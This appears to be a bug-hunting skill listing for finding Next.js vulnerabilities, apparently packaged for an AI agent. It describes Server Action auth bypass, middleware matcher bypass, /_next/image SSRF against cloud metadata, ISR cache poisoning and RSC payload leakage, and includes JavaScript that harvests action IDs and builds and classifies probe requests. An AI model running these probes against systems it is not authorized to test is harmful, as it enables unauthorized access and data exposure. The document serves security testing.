hunt-nextjs


HUNT-NEXTJS — Next.js / SSR Framework Vulnerabilities

Crown Jewel Targets

Next.js-specific bugs that bypass auth or reach SSRF = High/Critical.

Highest-value chains:

  • Server Actions auth bypass — a Server Action is just a POST to the page with a `Next-Action: <id>` header, and the action ID is shipped in the client bundle; if the action body never checks the session itself (auth lives only in the page, layout or a client component), call the ID directly → unauthorized data mutation or exfil
  • Middleware bypass via the matcher — a `matcher` that excludes all of /_next/ (rather than only /_next/static and /_next/image) also skips /_next/data/<buildId>/<page>.json, the JSON route that serves getServerSideProps results → protected-page props fetched directly, IDOR on the data route
  • /_next/image SSRF — the optimizer fetches the url= parameter server-side; a wildcard or over-broad remotePatterns entry, or an open redirect on an allowed host, turns it into an internal network probe or a cloud metadata read
  • ISR stale cache poisoning — unkeyed request input (a Host / X-Forwarded-Host header, a query parameter the cache key ignores) reflected into a page cached by ISR or the full route cache is served to every visitor until the next revalidation
  • RSC payload leakage — the React Server Component flight payload (request the route with an `RSC: 1` header) serializes every prop handed from a Server Component to a Client Component, including server-side fields that never appear in the rendered HTML
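
As an added example, not part of the hunt-nextjs skill or of Next.js itself, the helper below puts the chains above into runnable triage code: it tells you whether a middleware matcher leaves /_next/data/ unprotected, harvests Server Action IDs from a client bundle, plans the probe requests, and classifies responses against the unauthenticated baseline of the page. The host, buildId, page name and action ID are placeholders, the matcher-to-RegExp conversion is a simplification of path-to-regexp that only covers the regex-style matchers the Next.js docs use, and the remotePatterns error text is an assumption about the optimizer's message.

```javascript
// Added example (not the skill's or Next.js's own code). All hosts, buildIds,
// pages and action IDs are placeholders.

// (1) Does this `matcher` let a path skip middleware entirely?
// Assumption: simplified path-to-regexp conversion for the common
// "/((?!...).*)" form; named params such as "/about/:path*" are not handled.
function middlewareSkips(matcher, path) {
  const re = new RegExp(`^${matcher}/?$`);
  return !re.test(path); // true = middleware never runs for this path
}

// (2) Server Action IDs sit in client bundles as
// createServerReference("<hex id>", ...). Assumption: 40+ hex chars.
function extractActionIds(bundleSource) {
  const ids = new Set();
  const re = /createServerReference\)?\(\s*"([0-9a-f]{40,})"/g;
  for (const m of bundleSource.matchAll(re)) ids.add(m[1]);
  return [...ids];
}

// (3) Probe plan for one page. buildId is read from __NEXT_DATA__ or the
// /_next/static/<buildId>/ chunk paths; actionId comes from (2).
function buildProbes(base, buildId, page, actionId) {
  const slug = page.replace(/^\//, "") || "index";
  const ssrfTarget = "http://169.254.169.254/latest/meta-data/"; // cloud metadata
  return [
    { chain: "middleware-bypass", method: "GET",
      url: `${base}/_next/data/${buildId}/${slug}.json`, headers: {} },
    { chain: "rsc-leak", method: "GET", url: `${base}${page}`,
      headers: { RSC: "1" } },
    { chain: "image-ssrf", method: "GET",
      url: `${base}/_next/image?url=${encodeURIComponent(ssrfTarget)}&w=16&q=1`,
      headers: {} },
    { chain: "server-action", method: "POST", url: `${base}${page}`,
      headers: { "Next-Action": actionId,
                 "Content-Type": "text/plain;charset=UTF-8" },
      body: "[]" }, // serialized argument list of a zero-argument action
  ];
}

// (4) Classify a response. baselineStatus is what an unauthenticated GET of
// the page returns (307/302 to /login or 401 = the page is protected).
function classify(probe, res, baselineStatus) {
  const ct = (res.headers["content-type"] || "").toLowerCase();
  const body = res.body || "";
  const authRequired = [302, 307, 401].includes(baselineStatus);
  switch (probe.chain) {
    case "middleware-bypass":
      // protected page, but its props are served as JSON without a session
      return authRequired && res.status === 200 && ct.includes("application/json")
        && /"pageProps"/.test(body) ? "FINDING" : "OK";
    case "rsc-leak":
      // flight payload obtained; manual review for server-only fields
      return res.status === 200 && ct.includes("text/x-component") ? "REVIEW" : "OK";
    case "image-ssrf":
      if (res.status === 200 && ct.startsWith("image/")) return "FINDING";
      // Assumption: this is the optimizer's message when url= fails the allowlist.
      if (/"url" parameter is not allowed/.test(body)) return "OK";
      return "REVIEW"; // any other error means the server-side fetch was attempted
    case "server-action":
      // protected page, yet the action ran without a session
      return authRequired && res.status === 200 && ct.includes("text/x-component")
        ? "FINDING" : "OK";
  }
  return "UNKNOWN";
}
```

For the image-ssrf probe the interesting signal is usually not a 200 but the difference in error text between a reachable and an unreachable internal host, so anything classified REVIEW deserves a second request against a host that cannot exist. For middleware-bypass, run `middlewareSkips` on the matcher from the target's middleware.ts first: if it returns false for the /_next/data/ path, the probe is only worth sending when the middleware itself has other gaps.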

Attack Surface Signals

Installs: 9 · GitHub Stars: 2.6K · First Seen: Jun 5, 2026
hunt-nextjs — elementalsouls/claude-bughunter